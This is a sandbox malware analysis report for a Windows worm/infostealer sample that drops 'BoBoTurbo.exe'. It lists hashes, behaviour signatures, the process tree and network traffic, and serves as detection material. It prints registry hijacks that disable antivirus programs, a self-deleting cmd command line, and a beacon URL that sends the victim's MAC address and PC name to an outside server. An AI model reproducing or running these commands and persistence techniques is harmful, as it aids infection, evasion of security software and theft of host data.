Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02/10/2024, 20:20 UTC
Static task
static1
Behavioral task
behavioral1
Sample
0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe
-
Size
161KB
-
MD5
0c53020e8fb7b089a7fcb9d1534e7d60
-
SHA1
49304cb6355babbfd878ab5a0b01f34deb8030b1
-
SHA256
c6f22aa00fa730828c90e7032889291c5b624facd56561e6684c855927ae4939
-
SHA512
981978b569bb92540b6bfbe972b281b8c118612d4b1590763be5ca6eb19a8971fc4518d0c3cf0507986b595903c5791ca29bbfd3b562849a0379a1af7a5920eb
-
SSDEEP
1536:dVyn1qvUo29OpBlXb94kWV7PYKmy8MMoWQdSCXa:2n1QTOkWZwy/7q
Malware Config
Signatures
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-STOPW.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CF.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPM.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP32.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\APVXDWIN.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FESCUE.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW32.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EXPWATCH.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPM.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95_0.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWUPD32.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchUI.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANPM.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NORMIST.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\APVXDWIN.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rising.exe\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VETTRAY.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCFWALLICON.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NMain.exe\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TDS2-98.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMC.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav.exe BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSUPP95.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVP32.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVCL.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVFW.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVmon.exe BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FP-WIN.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT95.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVPM.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCRSCAN.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVCL.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVPM.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.EXE BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVsvcUI.exe BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVwsc.exe\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVmonD.exe BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVPCC.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navw32.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUALL.EXE BoBoTurbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMON.EXE\Debugger = "C:\\Windows\\system\\BoBoTurbo.exe" BoBoTurbo.exe -
Deletes itself 1 IoCs
pid Process 2764 cmd.exe -
Executes dropped EXE 4 IoCs
pid Process 2628 BoBoTurbo.exe 1760 BoBoTurbo.exe 2688 BoBoTurbo.exe 2116 BoBoTurbo.exe -
Loads dropped DLL 5 IoCs
pid Process 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 2628 BoBoTurbo.exe 1760 BoBoTurbo.exe 1760 BoBoTurbo.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: BoBoTurbo.exe File opened (read-only) \??\E: BoBoTurbo.exe File opened (read-only) \??\H: BoBoTurbo.exe File opened (read-only) \??\J: BoBoTurbo.exe File opened (read-only) \??\P: BoBoTurbo.exe File opened (read-only) \??\Q: BoBoTurbo.exe File opened (read-only) \??\N: BoBoTurbo.exe File opened (read-only) \??\R: BoBoTurbo.exe File opened (read-only) \??\X: BoBoTurbo.exe File opened (read-only) \??\B: BoBoTurbo.exe File opened (read-only) \??\G: BoBoTurbo.exe File opened (read-only) \??\I: BoBoTurbo.exe File opened (read-only) \??\K: BoBoTurbo.exe File opened (read-only) \??\M: BoBoTurbo.exe File opened (read-only) \??\Z: BoBoTurbo.exe File opened (read-only) \??\L: BoBoTurbo.exe File opened (read-only) \??\O: BoBoTurbo.exe File opened (read-only) \??\T: BoBoTurbo.exe File opened (read-only) \??\V: BoBoTurbo.exe File opened (read-only) \??\U: BoBoTurbo.exe File opened (read-only) \??\W: BoBoTurbo.exe File opened (read-only) \??\Y: BoBoTurbo.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\autorun.inf BoBoTurbo.exe File created C:\autorun.inf BoBoTurbo.exe File opened for modification F:\autorun.inf BoBoTurbo.exe File created F:\autorun.inf BoBoTurbo.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe BoBoTurbo.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe BoBoTurbo.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSOHTMED.EXE BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\wmpconfig.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Media Player\wmpconfig.exe BoBoTurbo.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\setup_wm.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Media Player\setup_wm.exe BoBoTurbo.exe File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe BoBoTurbo.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe BoBoTurbo.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Mail\wab.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\WMPSideShowGadget.exe BoBoTurbo.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\wmlaunch.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateComRegisterShell64.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe BoBoTurbo.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\shvlzm.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\wmplayer.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\sidebar.exe BoBoTurbo.exe File opened for modification C:\Program Files\7-Zip\7zG.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe BoBoTurbo.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.exe BoBoTurbo.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\wmpshare.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Media Player\wmlaunch.exe BoBoTurbo.exe File opened for modification C:\Program Files\7-Zip\7z.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler64.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Media Player\wmpshare.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe BoBoTurbo.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe BoBoTurbo.exe File opened for modification C:\Program Files\DVD Maker\DVDMaker.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\WMPDMC.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Media Player\wmprph.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe BoBoTurbo.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe BoBoTurbo.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Media Player\wmpnetwk.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe BoBoTurbo.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe BoBoTurbo.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\Hearts.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe BoBoTurbo.exe File opened for modification C:\Program Files\Windows Sidebar\sidebar.exe BoBoTurbo.exe File opened for modification C:\Program Files (x86)\Windows Media Player\wmplayer.exe BoBoTurbo.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe BoBoTurbo.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system\BoBoTurbo.exe 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe File created C:\Windows\system\BoBoTurbo.exe 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BoBoTurbo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BoBoTurbo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1916 wrote to memory of 1576 1916 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 31 PID 1916 wrote to memory of 1576 1916 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 31 PID 1916 wrote to memory of 1576 1916 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 31 PID 1916 wrote to memory of 1576 1916 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 31 PID 1576 wrote to memory of 2628 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 32 PID 1576 wrote to memory of 2628 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 32 PID 1576 wrote to memory of 2628 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 32 PID 1576 wrote to memory of 2628 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 32 PID 1576 wrote to memory of 2200 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 33 PID 1576 wrote to memory of 2200 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 33 PID 1576 wrote to memory of 2200 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 33 PID 1576 wrote to memory of 2200 1576 0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe 33 PID 2628 wrote to memory of 1760 2628 BoBoTurbo.exe 34 PID 2628 wrote to memory of 1760 2628 BoBoTurbo.exe 34 PID 2628 wrote to memory of 1760 2628 BoBoTurbo.exe 34 PID 2628 wrote to memory of 1760 2628 BoBoTurbo.exe 34 PID 1760 wrote to memory of 2116 1760 BoBoTurbo.exe 35 PID 1760 wrote to memory of 2116 1760 BoBoTurbo.exe 35 PID 1760 wrote to memory of 2116 1760 BoBoTurbo.exe 35 PID 1760 wrote to memory of 2116 1760 BoBoTurbo.exe 35 PID 1760 wrote to memory of 2688 1760 BoBoTurbo.exe 36 PID 1760 wrote to memory of 2688 1760 BoBoTurbo.exe 36 PID 1760 wrote to memory of 2688 1760 BoBoTurbo.exe 36 PID 1760 wrote to memory of 2688 1760 BoBoTurbo.exe 36 PID 2200 wrote to memory of 2764 2200 cmd.exe 38 PID 2200 wrote to memory of 2764 2200 cmd.exe 38 PID 2200 wrote to memory of 2764 2200 cmd.exe 38 PID 2200 wrote to memory of 2764 2200 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe _sys2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system\BoBoTurbo.exeC:\Windows\system\BoBoTurbo.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system\BoBoTurbo.exeC:\Windows\system\BoBoTurbo.exe _sys4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system\BoBoTurbo.exeC:\Windows\system\BoBoTurbo.exe down5⤵
- Executes dropped EXE
PID:2116
-
-
C:\Windows\system\BoBoTurbo.exeC:\Windows\system\BoBoTurbo.exe worm5⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in Program Files directory
PID:2688
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c erase /A:RHSA "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"&cmd /c del "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\cmd.execmd /c del "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"4⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2764
-
-
-
Network
-
Remote address:8.8.8.8:53Requestg.6u6.bizIN AResponse
-
Remote address:8.8.8.8:53Requestunion.21575.comIN AResponseunion.21575.comIN A107.167.27.81
-
GEThttp://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0BoBoTurbo.exeRemote address:107.167.27.81:80RequestGET /count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: union.21575.com
ResponseHTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 20:22:04 GMT
Content-Length: 1502
-
107.167.27.81:80http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0httpBoBoTurbo.exe647 B 2.0kB 9 9
HTTP Request
GET http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0HTTP Response
200
MITRE ATT&CK Enterprise v15
Privilege Escalation
Event Triggered Execution
1Image File Execution Options Injection
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
161KB
MD50c53020e8fb7b089a7fcb9d1534e7d60
SHA149304cb6355babbfd878ab5a0b01f34deb8030b1
SHA256c6f22aa00fa730828c90e7032889291c5b624facd56561e6684c855927ae4939
SHA512981978b569bb92540b6bfbe972b281b8c118612d4b1590763be5ca6eb19a8971fc4518d0c3cf0507986b595903c5791ca29bbfd3b562849a0379a1af7a5920eb